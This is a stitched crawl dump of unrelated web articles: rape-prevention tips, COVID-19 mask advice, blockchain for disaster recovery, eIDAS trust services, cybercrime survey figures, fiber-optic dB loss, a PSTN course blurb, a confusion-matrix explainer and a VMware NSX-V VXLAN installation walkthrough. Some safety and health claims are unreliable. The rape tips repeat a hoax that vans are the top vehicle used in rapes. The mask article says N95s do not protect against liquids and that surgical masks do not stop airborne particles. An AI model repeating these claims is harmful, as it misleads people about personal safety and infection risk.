- Be mysterious online. Think twice before leaving status or away messages and when using the check-in feature on Facebook or Foursquare. Posting your whereabouts exposes details that are accessible to everyone, and allows people to track your movements. Think of it like this: If you wouldn’t reveal the info to a stranger, then don’t put it on your profile.
- Avoid going out at night. If you happen to be out at night, make sure it is a well-lit, crowded, main street and you are with at least one other person. Carry your cell phone in your hand ready to make a call, and, if you have one, a key in the other one to be used as a weapon.
- When at home, play it safe by never letting people into your home that you do not know. If it is a handyman, cable repair, etc., tell them you need to see a photo ID and their truck. If you don’t trust them instantly then do not let them in. If they do not look you in the eyes, have a photo ID, drive a truck with the company name on it, or wear a uniform, that is suspicious behavior. Do not let them into your home! Ask them to call the company while they wait outside then have the company call you or call the company yourself.
- Do not be distracted, especially by technology. Do not jog with your iPod because attackers are looking for easy, distracted individuals who look like they are not paying attention to their surroundings. The same can be said for talking on your cell phone. But, on the other hand, if you feel someone is following you, pull out your cell phone and pretend to be talking to someone because your "conversation partner" would be aware of an attack. If your potential attacker is going for "no witnesses," they might back off and change their mind. You can even pretend you are meeting up with someone and they are already here/heading this way VERY soon. Don’t say "5 minutes" or the attacker may only decide to take action quicker. If they think you are in safe hands or will be in less than a minute, they might back off.
- Be aware of your surroundings at all times. Parking lots and parking garages are two of the sites that are most often targeted by attempted rapists. These men are predators, so view your surroundings carefully. If you are in a parking lot and feel someone is following you, start making noise - talk to yourself loudly, talk to an imaginary person, or pretend to talk on your cell phone. The louder the potential victim, the more the predator is apt to freeze.
- Carry defensive items only if you know how to use them. Remember, any "weapon" that could hurt a potential attacker can be used against you if you are not well trained and comfortable with it. Remember that even an umbrella or purse can be used as a weapon against an attacker, and has less chance of being turned against you.
- Understand that Vans are the #1 vehicles used in rapes. Rapists will park next to the driver’s side and, as you are trying to get in, they will pull you into the van. If there is a van on the driver’s side of your car, go in through the passenger’s door. If there are vans on both sides, go back to where you were and get someone like a security guard to walk you to your car. Don’t park in any place that feels unsafe.
Keep in mind
Avoid situations and lifestyles that could lead you to be raped. Not all men are bad, there are only a few misbehaving most of them are very respectful, caring and good fathers, husbands brothers, uncles, grandfathers, neighbors, and friends. So do not condemn them in general. | <urn:uuid:2a7177ea-256f-467c-9431-acfc848b96fd> | CC-MAIN-2022-40 | https://www.knowledgepublisher.com/article/1135/tips-on-how-to-avoid-and-prevent-rape.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00403.warc.gz | en | 0.962195 | 1,743 | 3.015625 | 3 |
For weeks, we’ve heard conflicting information on whether we should wear masks in public. Of course, anyone diagnosed with COVID-19 should stay home and wear a mask to protect those who are not ill. Caregivers for anyone with COVID-19 should also wear a mask. But what about everyone else?
The Centers for Disease Control and Prevention (CDC) now recommends people wear cloth or fabric face masks in public. Wearing masks is voluntary, so should you do it?
The short answer is, again, yes. Everyone should wear a face mask in public: in grocery stores, in pharmacies, when taking public transportation, when answering your door, especially on airplanes, buses, subways, Uber and Lyft, and everywhere else people gather.
Keep reading to find out what kind of mask you should wear and the safest way to do so.
Why the mixed messages?
Since the start of the coronavirus spread in the U.S., the CDC has said masks were only necessary in public for those infected, showing symptoms or taking care of someone who was. The World Health Organization said the same.
Perhaps the CDC was attempting to conserve face masks for hospitals and first responders. America believed that message — for a while.
But the evidence from South Korea, Hong Kong and other parts of Asia where wearing face masks in public is an ordinary part of daily life, the spread of the virus is reduced — so much so that on April 2, the White House changed its position on face masks.
Now, two questions emerge: What kind of mask should you wear? And how do you put them on without contaminating the mask or yourself?
Which mask is right for me?
There are several varieties of masks floating around on the web and in stores, but which one is the best for your health? Well, the answer depends on a couple of factors — namely what’s in stock at the moment and how far you want to go in terms of protecting yourself.
When it comes to simple face masks, the N-95 respirator is clearly one of the best you can buy. The name “N95” refers to the fact that the mask is “Not resistant to oil” (which means it doesn’t protect against liquids) and filters up to 95% of airborne particles.
These masks are also certified by both the WHO and CDC for medical use and are in high demand from doctors around the country.
That’s also the reason the CDC is shooing the public away from them. Right now, they’re in short supply and needed in hospitals. Some eBay sellers are offering so-called KN95 masks, saying they’re as good as the N95. But KN95 masks are made in Chinese factories not certified safe by the Food and Drug Administration.
If you want to order these, you might be out of luck. Most online retailers are barred from selling N95 respirators altogether, and some international sellers are taking advantage of the shortage to sell them at ridiculously high prices. Let the buyer beware.
Most health organizations recommend these cheap, disposable masks for regular use by civilians. These masks are multi-layered and are able to protect against liquid droplets, which are a primary vector of COVID-19 transmission.
What these masks do not protect against, however, are airborne particles that may include the SARS-CoV2 virus. Think of surgical masks as a basic precautionary measure to use on top of standard social distancing and isolation practices.
These masks are a bit easier to acquire and can be purchased from CVS and Walmart for about $13 for a set of 50. Shipping estimates are pushed all the way out to May, unfortunately.
These masks are designed for aerobic cyclists who bike in heavily polluted areas. As such, they contain an air filter built into the front, which can be useful for filtering out harmful particles.
These masks, while effective, are not regulated to the same standard as medical-grade masks. As such, you shouldn’t expect it to fully protect you from viral particles in the air. Use a cycling mask more as a tool for peace of mind than for full protection.
Cycling masks are currently sold out at most sporting goods stores, but some retailers on Amazon have them for sale for up to $44 a pop. Most shipping estimates put delivery around June of this year.
A literal gas mask
Unless you’re ready to head to those ghastly trenches from the Great War, you probably won’t need a full-fledged gas mask. Heavy metal fans and gothic ravers have long made use of this wartime protective gear for aesthetic purposes, but COVID-19 has caused a significant spike in demand from the general public.
A variety of these masks are available in prices ranging up to hundreds of dollars for military-certified gear. You’ll have to purchase them from an army surplus store, such as this one from the Czech Republic, but don’t expect your order to arrive anytime soon. International shipping is experiencing heavy delays thanks to the virus.
Oh, and you’ll also look extremely paranoid wearing this in public. We’d recommend saving this one for the doomsday bunker instead.
Simple cloth masks, bandanas and scarves
The good news is that for general use and wearing a mask in public for prevention, N95 masks and other protective headgear are NOT necessary. Cloth masks, which are all the rage in both the fashion world and online stores, are fine, fairly inexpensive and easy to wear.
Many of these masks are available from apparel retailers and crafts stores like Etsy for around $20. The masks themselves are reusable and should be thoroughly washed each time you’re finished with them. These masks do not offer full-fledged particle filtration, but instead, add a layer of protection to your face that wouldn’t be there otherwise.
Plus, they’re plenty effective at keeping viral particles in on the off chance that you’re an asymptomatic carrier. The same goes for surgical masks, which are actually better at protecting others from your droplets than the other way around.
If you cannot find cloth or surgical masks, you can use a clean bandana or scarf. You may look like you’re about to rob a stagecoach, but you’re adding a measure of personal safety.
How to wear a mask safely
So whether it’s a mask, scarf or bandana, BEFORE you put in on, wash your hands for AT LEAST 20 seconds in hot soapy water, dry your hands with a clean paper towel and throw the paper towel away.
If you’re using a mask, it has two strings that loop behind your ears. Put the mask on and open it up to cover above your nose and below your chin. It’s folded in two places like an accordion.
If the mask has a nose clip, like a surgical mask, pinch the clip snugly to the shape of your nose. This will prevent gaps in the mask, as well as slippage during wear.
While wearing it, do not touch the mask. Promptly take it off and throw it away before walking into your home. Then, wash your hands again.
For scarves and bandanas, make sure they are freshly cleaned. Tie it around your face, covering your nose and mouth. Again, while wearing, do not touch it.
Promptly take it off before walking into your home and put it right in the wash. Set your washer and dryer to sterilize if you have that setting available, or use the hottest water setting you can. Then wash your hands again.
Remember: Always assume everyone you meet has the virus and act accordingly. The only surefire way to prevent contracting the virus is to avoid being exposed to anyone who has it.
The information contained in this article is for educational and informational purposes only and is not intended as health or medical advice. Always consult a physician or other qualified health provider regarding any questions you may have regarding a medical condition, advice, or health objectives. | <urn:uuid:0c4687eb-fc81-47eb-992c-d0f7d6c524fe> | CC-MAIN-2022-40 | https://www.komando.com/coronavirus/covid-19-face-mask-tips/733714/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00403.warc.gz | en | 0.947939 | 1,707 | 2.640625 | 3 |
Blockchain technology related topics are gaining a lot of attention lately, most of the attention is focused on cryptocurrency such as Bitcoin. Some predict it as the new internet revolution which could lead to new technological innovations in economics and social transformations.
Blockchain is running on a peer-to-peer network, with many distributed nodes and supporting independent computer servers globally. Part of it is implemented without any centralized authority and has a built-in fraud protection and consensus mechanism, such as the concept of Proof-of-Work, where peer computers in nodes approve every requirement for the generation of a new set of transactions or block to be added to the database a.k.a. “Block Chain”.
It also has a built-in check and balance to ensure a set of colluding computers can’t game the system. Blockchain also brings in an element of transparency, which reduces fraud as the entire chain is visible and auditable.
But how will Blockchain bring innovation to businesses in performing business continuity and disaster recovery?
Peer-to-Peer Fault-Tolerant. When a disaster happens and destroys some network nodes or a cyber attack penetrates the network, this will not hinder the operation of the rest of the network because every node has a copy of the Blockchain ledger due to its decentralized nature.
Availability. It provides 24/7/365 availability without using any complex technologies, like a disaster recovery center or database redundancy.
Smart Contract. It is capable of storing program code which will trigger once given conditions or deliverables are met. These codes are stored in a block that can call and execute system API or web services such as alert notifications, transaction rollback procedures, network lockdown and backup procedures during disaster recovery or business continuity exercises.
Secure and reliable. Security and fraud protection is also built into Blockchain. It employs an advanced cryptography that is close to impossible to break and tamper-proof therefore every transaction is highly reliable.
Even though Blockchain is still in its infancy, just like the internet in the late 90’s, awareness is high with some technology entrepreneurs and businesses who started developing proof-of-concepts and use-cases that later on can be used as real solutions to real problems.
Reach out for a no obligation, initial conversation. | <urn:uuid:65442842-98d4-4b53-835e-d6ba3a0f28a7> | CC-MAIN-2022-40 | https://infiniteblue.com/blockchain-for-business-continuity-and-disaster-recovery/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00403.warc.gz | en | 0.939703 | 467 | 2.828125 | 3 |
Globalization has continued its inexorable march over the last decades. The movement of everything from capital, labor, ideas, goods, and services across borders has made the world a smaller place. International organizations create the rules that define and guide interactions between people and nations. In parallel, we are seeing another revolution - digitizing our economy at a breath-taking pace.
But what happens when you combine the two? As digitized as countries may be, when their economies interact with each other, they still seem stuck in the 90s. This is because countries have their own unique digital systems in place that often don’t connect well with another country’s systems. This mismatch has always existed because of language, legal or physical barriers. But in the digital age, it shouldn’t exist.
The European Commission has made great strides toward achieving the Digital Single Market across all member states. EU initiatives like eIDAS, PSD2, AML4, and others pave the way toward a cross-border system of digital identities and communication.
Perhaps this experience of trying to create a harmonized system among this group of diverse states places Europe in a prime spot to take the initiative globally.
The European Telecommunications Standards Institute (ETSI) conducts workshops on the globalization of trust several times a year. These workshops are not only being held in Europe but also various locations across the world. Clearly, the focus is global. The aim of these workshops is to reach a consensus on the international recognition of national / regional PKI-based trust services schemes.
Why do we need Global Trust?
Some answers to this question are obvious. The trade of goods and services across national boundaries will undoubtedly be made smoother and faster if trust between the trading partners could be established through such schemes. With the mutual recognition and acceptance of national eID / trust schemes, friction in international trade can be minimized.
But there are also some not-so-obvious answers. In addition to promoting the global economy, this is also about gaining competitive advantages both at a macro level and for companies back home. By taking the lead on such initiatives, a country can influence the development of global standards in a way that matches its own preferences. Additionally, its own companies can also participate in the process and they would undoubtedly find it easier to adapt to a global system that is very similar to what they have locally.
The Full Package
.A global digital trust system also requires a mutually recognized legal framework and a technological infrastructure that is compatible.
Creating these systems takes time since the various global participants often have conflicting views on how to proceed, which is why starting early and starting small can be a viable strategy.
Within the EU, the various directives provide a solid and complete framework for the Digital Single Market.
Adopting something similar on a global scale would be much more challenging, but given the sheer volumes of trade at stake, it would be equally rewarding.
References and Further Reading
- Selected articles on eIDAS (2014-today), by Gaurav Sharma, Guillaume Forget, Jan Kjaersgaard, Dawn M. Turner, and more
- Benefits of the eIDAS Toolbox – Case Studies from Various Industries (Part 1) (2018), by Gaurav Sharma
- Benefits of the eIDAS Toolbox – Case Studies from Various Industries (Part 2) (2018), by Gaurav Sharma
- Digital Trade and Trade Financing - Embracing and Shaping the Transformation (2018), by SWIFT & OPUS Advisory Services International Inc
- REGULATION (EU) No 1316/2013 establishing the Connecting Europe Facility, amending Regulation (EU) No 913/2010 and repealing Regulations (EC) No 680/2007 and (EC) No 67/2010(12/2013), by the European Parliament and the European Council
- Selected articles on Electronic Signing and Digital Signatures (2014-today), by Ashiq JA, Gaurav Sharma, Guillaume Forget, Jan Kjaersgaard , Peter Landrock, Torben Pedersen, Dawn M. Turner, and more
- The European Interoperability Framework - Implementation Strategy (2017), by the European Commission
- Proposal for a DIRECTIVE OF THE EUROPEAN PARLIAMENT AND OF THE COUNCIL amending Directive (EU) 2015/849 on the prevention of the use of the financial system for the purposes of money laundering or terrorist financing (2016), by the European Commission
- REGULATION (EU) 2016/679 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data, and repealing Directive 95/46/EC (General Data Protection Regulation) (2016), by the European Parliament and the European Council
Proposal for a REGULATION concerning the respect for private life and the protection of personal data in electronic communications and repealing Directive 2002/58/EC (Regulation on Privacy and Electronic Communications), (2017), by the European Parliament and the European Council
- Revised Directive 2015/2366 on Payment Services (commonly known as PSD2) (2015), by the European Parliament and the Council of the European Union
- REGULATION (EU) No 910/2014 on electronic identification and trust services for electronic transactions in the internal market and repealing Directive 1999/93/EC (2014) by the European Parliament and the European Commission
DIRECTIVE 2013/37/EU amending Directive 2003/98/EC on the re-use of public sector information (2013) by the European Parliament and the Council | <urn:uuid:6222e397-8242-456e-80e2-8b99fee1cbd9> | CC-MAIN-2022-40 | https://www.cryptomathic.com/news-events/blog/eidas-and-the-globalisation-of-trust | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00403.warc.gz | en | 0.920641 | 1,148 | 2.640625 | 3 |
Over the past year, 330 million people fell victim to cybercrime, new research shows. Even though Americans claim to have taken certain precautions against cybercrime, around 40% of them still don’t know how to stay safe online.
“Cybercriminals have taken advantage of our changing behaviors and increased digital footprint,” Paige Hanson, chief of cyber safety education at NortonLifeLock, said.
The research by NortonLifeLock revealed that in the past year, nearly 330 million people across ten countries became victims of cybercrime, and more than 55 million people became victims of identity theft. Cybercrime victims collectively spent almost 2.7 billion hours trying to resolve their issues.
“This past year has been incredibly challenging as we’ve navigated the emotional and physical effects of a global pandemic. What’s more, there is the added concern for the online health and safety of our families as we spend more time online,” Hanson said.
The annual Norton Cyber Safety Insights Report also found that one-quarter of Americans (25%) detected unauthorized access to an account or device in the past 12 months. This research was conducted online in partnership with The Harris Poll among over 10,000 adults in 10 countries, including 1,000 in the United States.
In the past 12 months, nearly 108 million Americans experienced cybercrime. On average, they spend 6,7 hours trying to resolve the related issues. It means that Americans lost around 719 million hours to cybercrime over the past year. Nearly half of Americans feel more vulnerable to cybercrime than they did before the pandemic.
Time spent online has increased significantly since the start of the pandemic, and not everyone is able to determine if the information they see online is from a credible source. These are considered to be the key drivers of peoples’ cybercrime insecurity.
73% of Americans say they are spending more time online than ever before, with 59% saying they are more worried about becoming a victim of cybercrime and 56% admitting it’s difficult for them to determine if the information they see online is credible. Furthermore, 76% believe that remote work has made it much easier for hackers and cybercriminals to take advantage of people.
However, researchers are starting to see a silver lining with consumers fighting back and trying to protect themselves online. 77% of Americans claim they have taken more precautions while surfing the net. Almost all Americans, who detected unauthorized access to an account or device, took some action, such as creating a stronger password(s) (66%) or contacting the company the account was hacked from (51%). Many turned to a family member(s) (33%) or the internet (31%) for help, while others invested more in security software through first-time purchases or doubled down on pre-existing subscriptions (18%).
Although Americans started taking more precautions, two in five of the respondents still admit they don’t know how to protect themselves from cybercrime. Nearly half of Americans would have no idea what to do if their identity was stolen.
More from CyberNews:
Subscribe to our newsletter | <urn:uuid:4474046c-d618-4194-8e7b-2aaad33bd22c> | CC-MAIN-2022-40 | https://cybernews.com/news/americans-lost-over-700m-hours-to-cybercrime/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00403.warc.gz | en | 0.960352 | 640 | 2.625 | 3 |
In fiber optics, data is transmitted through light pulses sent through thin glass strands. The performance of these cables is measured in decibels (dB), which indicates how much power the light has when it moves through the cables. The goal is naturally to transmit 100% of the data, so measuring how much of the data may get lost in transit can indicate how well the cables perform. This measurement is called dB loss. Too much light loss leads to failure and signifies that the fiber cable is not up to industry standards. So how can you make sure your fiber cables are not suffering significant dB loss? Read on to learn what causes this loss and measures that can be taken to avoid it.
How db Loss in Fiber Cables Happens
You should consider dB loss as early as before the installation occurs. Cables built to provide the lowest possible dB loss help ensure the best data transmission. Although these cables might have a higher price point, their durability will make them well worth the cost.
However, after installation, dB loss may be caused by end-point contamination. Touching connector ends can contaminate the transmission of light by smearing the glass ends with dirt and oil common on fingers. A scope can inspect the cable end faces, and a special cleaner can be used to ensure a pristine surface. If your fiber optic cable is defective, it may just need to be cleaned. Rather than throwing out cables, contact a professional fiber optic cable contractor who has the expertise and tools to carefully examine the fiber cables and return them to a pristine condition.
Why It is Important to Minimize dB Loss
The power of your fiber optic cables lies in their ability to transmit important information and data cleanly. A mediocre cable or a poor installation of a good one can devalue your data and deprive you of vital high-speed data transmission.
It is essential then to hire experienced fiber optic cable technicians who can properly install cables and take measures to avoid data loss and network failure. Many organizations consider data to be their most valuable asset. The quickest way to lose this asset is through poor data transmission. By selecting the right cables and installation, you can ensure that your network’s dB loss remains low throughout its lifetime.
Get in Touch with FiberPlus
FiberPlus has been providing data communication solutions for over 25 years in the Mid Atlantic Region for a number of different markets. What began as a cable installation company for Local Area Networks has grown into a leading provider of innovative technology solutions improving the way our customers communicate and keeping them secure. Our solutions now include:
- Structured Cabling (Fiberoptic, Copper and Coax for inside and outside plant networks)
- Electronic Security Systems (Access Control & CCTV Solutions)
- Wireless Access Point installations
- Public Safety DAS – Emergency Call Stations
- Audio/Video Services (Intercoms and Display Monitors)
- Support Services
- Specialty Systems
- Design/Build Services
- UL2050 Certifications and installations for Secure Spaces
FiberPlus promises the communities in which we serve that we will continue to expand and evolve as new technology is introduced within the telecommunications industry.
Have any questions? Interested in one of our services? Call FiberPlus today 800-394-3301, email us at email@example.com, or visit our contact page. Our offices are located in the Washington, DC metro area, Richmond, VA, and Columbus, OH. In Pennsylvania, please call Pennsylvania Networks, Inc. at 814-259-3999. | <urn:uuid:e3692840-5148-4fe0-a775-c5a0b752768b> | CC-MAIN-2022-40 | https://www.fiberplusinc.com/helpful-information/db-loss-prevention/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00403.warc.gz | en | 0.932436 | 722 | 2.828125 | 3 |
Upon completing this course, you will have learned how to:
– Understand the background and definition of PSTN
– Understand regulatory considerations and timeline
– Describe the impact on services in the telecom environment
– Evaluate risks associated to PSTN transitioning
– Understand PSTN transitioning strategy considerations
This course will provide an overview of what Public Switched Telephone Network (PSTN) transitioning is, what enterprises need to know and how they should prepare for it. The Federal Communications Commission (FCC) has accelerated the timeline on transitioning the legacy technology in the public switched telephone network to IP-based services. This transition will affect all Plain Old Telephone Service (POTS) and Time Division Multiplexing (TDM) – based voice services and organizations must establish a strategy to migrate PSTN to IP services as the underlying technology of the public telephone network changes. | <urn:uuid:9e22d2a1-4c66-45ca-9be3-70529ded835a> | CC-MAIN-2022-40 | https://aotmp.com/product/pst-pstn-transitioning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00403.warc.gz | en | 0.913786 | 174 | 2.703125 | 3 |
A confusion matrix is a performance measurement technique for a machine learning classification algorithm. Data scientists use it to evaluate the performance of a classification model on a set of test data when the actual values are known. For example, classification accuracy can be misleading, especially when two or more classes are in the dataset.
Consequently, calculating the confusion matrix helps data scientists understand the effectiveness of the classification model.
The confusion matrix visualizes the accuracy of a classifier by comparing the actual values and the predicted values. In addition, it presents a table layout of the different outcomes of the prediction, such as the table below:
Let’s decipher the confusion table:
Now that we have deciphered the confusion table let’s understand each value.
Let’s consider the following example to understand the confusion matrix and its values better. Suppose we want to create a model that can predict the number of patients suffering from migraines.
In this case:
Let’s consider the following numbers:
Let’s break the numbers down
Consequently, the true positives and the true negatives tell us how many times the algorithm correctly classified the samples. On the other hand, the false negatives and false positives indicate how many times the algorithm incorrectly made predictions.
Once we have filled out the confusion matrix, we can perform various calculations for the model to understand its accuracy, error rate, and more.
Once the confusion matrix has determined the number of True Positives (TP), True Negatives (TN), False Negatives (FN), and False Positives (FP), scientists can determine the model’s classification accuracy, error rate, precision, and recall.
Classification accuracy is one of the most critical parameters to determine because it defines how often the model predicts the correct output. The higher the accuracy, the better the model. To calculate the model’s accuracy, consider the following formula:
Accuracy = TP+TN / TP+FP+FN+TN
Let’s consider the example of predicting patients with migraines. In that instance, the accuracy of the machine learning algorithm is 100+150/100+20+30+150 = 0.83
This means that the machine learning algorithm is 83% accurate in its predictions.
Also referred to as the error rate, the misclassification rate defines how often the model makes incorrect predictions. The error rate is calculated through the following formula:
Error rate = FP+FN/TP+FP+FN+TN
Based on the example above, the miscalculation rate is 20+30/100+20+30+150 = 0.17
Hence, the machine learning algorithm is 17% inaccurate in its predictions.
Precision compares the number of correct outputs provided by the model (true positives) to the total number of classified positive samples (true positives and false positives). It is one indicator of the model’s performance and helps scientists measure its ability to classify positive samples.
The model’s precision can be calculated using the following formula:
Precision = TP/TP+FP
In our case, precision equals 100/100+20 = 0.83
This means that out of all the positive predictions, 83% were true.
Recall lets data scientists measure the model’s ability to detect positive samples. The higher it is, the more positive samples the model has detected.
It is calculated as the ratio between the number of positive samples correctly classified (TP) to the total number of positive values.
Recall = TP/TP+FN = 100/100+30 = 0.76
This means that out of all the actual positive cases, only 76% were predicted correctly.
|Helps data scientists measure the model’s ability to classify positive samples||Helps data scientists measure the number of positive samples correctly classified by the model|
|Scientists consider positive and negative samples to calculate the model’s precision||Scientists only consider all positive samples to calculate the model’s recall|
|Scientists consider all positive samples, including those that the model identified incorrectly||Scientists only consider the positive samples correctly classified by the model, disregarding negative samples classified as positive (FP)|
A confusion matrix allows data scientists to understand how effective their machine learning algorithm is in making correct predictions. It also allows them to understand incorrect predictions and calculate the error rate to improve the machine learning lifecycle. | <urn:uuid:740f49d4-33a3-4960-9bee-3fa3bbc99713> | CC-MAIN-2022-40 | https://plat.ai/blog/confusion-matrix-in-machine-learning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00403.warc.gz | en | 0.863832 | 921 | 3.578125 | 4 |
Save to My DOJO
Software-defined networking is revolutionizing the world of networking as we know it. It is doing for the networking world what server virtualization has accomplished for the datacenter. Software-defined networking is allowing organizations to overcome and even eliminate obstacles in the networking arena for the enterprise. It has also opened up a whole new world of possibilities.
VMware’s NSX is arguably one of the most popular software-defined networking (SDN) solutions in use today. VMware NSX-V uses an overlay encapsulation protocol called Virtual Extensible LAN (VXLAN) to create the overlay network used to create the virtual networks. What is VXLAN? Why is it required? What role does it play in virtual networking? What is the difference between VXLAN and traditional VLANs? How are VXLANs configured using VMware NSX-V?
Importance of network virtualization
Organizations are increasingly adopting cloud technologies and infrastructure. It includes increasingly virtualized constructs as part of this move toward cloud environments. New, very complex modern applications may require connectivity to components located in many different geographic regions. Network virtualization is allowing multiple virtual servers to connect to the same logical network despite different locations.
Network virtualization has made possible more robust east-west data center traffic than the more traditional north-south traffic flow between client-server architectures. Also, businesses today are moving at a rapid pace. One of the appealing facets of the cloud is the agility provided to provision infrastructure, including networks. Traditional network infrastructure has long been a roadblock to efficient and quick infrastructure provisioning. Making changes to typical physical network environments could take weeks with the various change control and technical configuration involved.
What is VXLAN?
VXLAN is an encapsulation protocol initially documented by the IETF in RFC 7348. It allows software solutions to tunnel Layer 2 communication over Layer 3 networks as described in the process above. VXLAN allows encapsulating Layer 2 network frames within UDP datagrams and transmitting them across Layer 3 boundaries. So, simply put, it encapsulates Layer 2 frames inside Layer 3 packets. Compared to the relatively limited number of Layer 2 VLANs possible, VXLAN offers the ability to create up to 16 million logical networks providing Layer 2 adjacency across Layer 3 IP networks. This increased scalability is made possible by a 24-bit header attached to the frame. This specialized header is known as the Virtual Network Identifier (VNI).
The increased scalability is an excellent feature for service providers and others who may have many different tenants. The 16 million VNIs means a unique ID can be assigned to potentially millions of customers, and this ID can remain unique across the entire network. Like a VLAN ID, the VNI establishes a boundary that allows isolation from one tenant to another. Since the VXLAN protocol is based on the IETF standard, it is an open standard not reliant on any particular vendor solution. The VXLAN encapsulation protocol is what provides the underlying technology upon which solutions can construct network virtualization solutions.
Another point to consider with VXLAN is that it is not merely a technology that can only be taken advantage of by virtualized solutions. VXLAN is an encapsulation protocol that can also be used by hardware devices that have the feature built-in. An example of a VXLAN-aware device is the Cisco Nexus 9000-EX platform.
There is another unique construct of VXLAN that is important to understand. The VXLAN Tunnel Endpoint (VTEP) is responsible for encapsulating and decapsulating the Layer 2 frame traffic. The VTEP can be a virtualized solution like VMware NSX-V or a hardware gateway. Creating the VXLAN VTEPs is part of configuring a VXLAN implementation. We will see how this is configured in VMware NSX-V.
Overlay vs. Underlay
The VXLAN encapsulation protocol encapsulation of Layer 2 frames inside of Layer 3 packets creates what is known as an overlay. In contrast, the physical IP network that transmits the packets constitutes the underlay. The network overlay creates a layer of abstraction that allows the virtualized network to overlay “on top of” the physical network.
The network overlay is created when a packet or frame is encapsulated at its source and transmitted to the destination edge device. The encapsulation adds an outer header that allows the intermediary network devices to transmit the packet and forward it based on the outer header. They remain unaware of the original packet payload with the Layer 2 frame underneath. Once the packet arrives at the destination, the packet is decapsulated, and the receiving device strips off the outer header. The encapsulation process described is handled with an encapsulation protocol such as VXLAN.
This overlay created through the encapsulation protocol allows Layer 2 boundaries to stretch across the Layer 3 network underlay. In traditional networking constructs within a physical network with physical devices outside of network virtualization, Layer 2 segments are not “routed” or carried across Layer 3 boundaries. Certain technologies in the physical world, such as EoMPLS, VPLS, and OTV, allow stretching Layer 2 segments across routed boundaries. However, their implementation and flexibility aren’t nearly as seamless as using VXLAN.
One of the tremendous advantages of the overlay and underlay network design is it decouples the network configuration of the overlay and underly from one another. You can make changes in the overlay network without affecting the underlay and vice versa. However, it is essential to note that the underlay network’s stability and reachability affect the overlay networks created on top of them.
- Underlay – The underlay network includes the physical Layer 3 IP network used to transmit packets. The physical IP network includes all the physical hardware, cabling, and routing protocols used to transmit and receive these packets. OSPF, IS-IS, and BGP are examples of standard routing protocols for this purpose.
- Overlay – The overlay network is formed “on top of” the underlay physical network architecture. Configuration of the overlay network is decoupled from the configuration of the underlay network. Multiple virtual networks can overlay on top of a single physical network. Standard routing protocols are used to transmit VXLAN encapsulated packets.
Logical Overview of the VXLAN overlay network
VXLAN vs. VLAN
Those familiar with traditional networking constructs like VLANs will note similarities between the functionality of VXLAN and VLANs. VLANs provide a Layer 2 boundary in conventional networking that provides the “home” for a particular IP subnet. However, when comparing VLAN and VXLAN, the capabilities of VXLAN exceed those found in traditional VLANs in several areas. Let’s look at a quick comparison:
- VLANs allow some 4000+ different network segments
- VXLANs allows 16 million different network segments
- VLAN IDs are 12-bits in length, while VXLAN is 24-bit
- VLANs require trunking, whereas VXLAN does not
- VXLAN does not require spanning tree
- VLANs require physical network configuration
- VXLAN does not require physical network configuration to segment traffic
VMware NSX-V VXLAN Implementation
VMware NSX-V uses VXLAN for the network overlay encapsulation technology. It allows creating isolated multi-tenant broadcast domains and enables customers to have the ability to create logical networks that span between physical networks and underlying network locations. VMware NSX-V networking makes use of VXLAN to create logical networks and abstract networking resources.
It does this in much the same way as compute resources are virtualized and combined in virtual pools of resources consumed in the vSphere environment. VMware NSX-V allows doing this using VXLAN across clusters, pods, and even geographically separated data centers. As described above, VXLAN creates Layer 2 logical networks encapsulated in standard Layer 3 IP packets. A unique identifier called the Segment ID exists in each frame that designates VXLAN logical networks. It is different than VLAN tags, and we will see a bit later. The segment IDs allow creating isolated Layer 2 VXLAN networks that can coexist on the same Layer 3 network.
You may wonder where the encapsulation happens in VMware vSphere with NSX-V. The encapsulation is carried out between the virtual NIC of the guest workload VM and the logical port on the vSphere virtual switch. This encapsulation process benefits the VXLAN encapsulation by being transparent to the guest VM and underlying Layer 3 network infrastructure. How does a receiving server or device outside of the VXLAN construct communicate with nodes found on the VXLAN segment? It is made possible by the NSX Edge services gateway appliance. It translates VXLAN segment IDs to the VLAN IDs needed to communicate between the VMs on the VXLAN and these physical devices. What infrastructure is required to create the VXLAN VMware configuration?
VMware NSX-V is the NSX Data Center solution for vSphere environments. The NSX Manager is a special-purpose service VM (SVM) that provides the GUI and REST APIs needed to create, configuring, and monitor NSX components. These components include the NSX Controllers, logical switches, and edge services gateways. Also, it provides the centralized network management component of NSX Data for vSphere. VMware packages the VMware NSX Manager appliance for NSX-V as an OVA appliance deployed into a VMware vSphere environment. It is the first component of the NSX-V infrastructure provisioned to begin configuring NSX-V.
Installing VMware VXLAN using NSX-V Manager
Let’s take a look at installing VMware VXLAN using the NSX-V Manager appliance in VMware vSphere. Deploying the VMware NSX-V Manager appliance is the first step to deploy VXLAN in your vSphere environment. After deploying the NSX-V Manager, you will integrate it with vCenter Server, which makes installing the special VMware NSX-V VIBs possible in your vSphere clusters. Once the VMware NSX-V Manager appliance is integrated with vCenter Server, you can configure VXLAN and the other logical constructs that make up your vSphere virtualized network.
After you download the VMware NSX-V Manager OVA appliance file, you deploy this using the standard means in the vSphere Client. Choose the OVA file on the Deploy OVF Template wizard.
Choosing the NSX-V Manager OVA
Select the name of the NSX-V Manager appliance and the folder location in your vSphere datacenter.
Choose the virtual machine name and folder
Select the compute resource in which you will run the NSX-V Manager appliance. It is standard best practice to run service VMs such as the VMware NSX-V Manager in a management cluster that houses other infrastructure VMs such as vCenter, vROPs, and others.
Choose the compute resource from your VMware vSphere datacenter
The wizard will display the initial deployment details for review.
Review the details of the VMware NSX-V Manager deployment
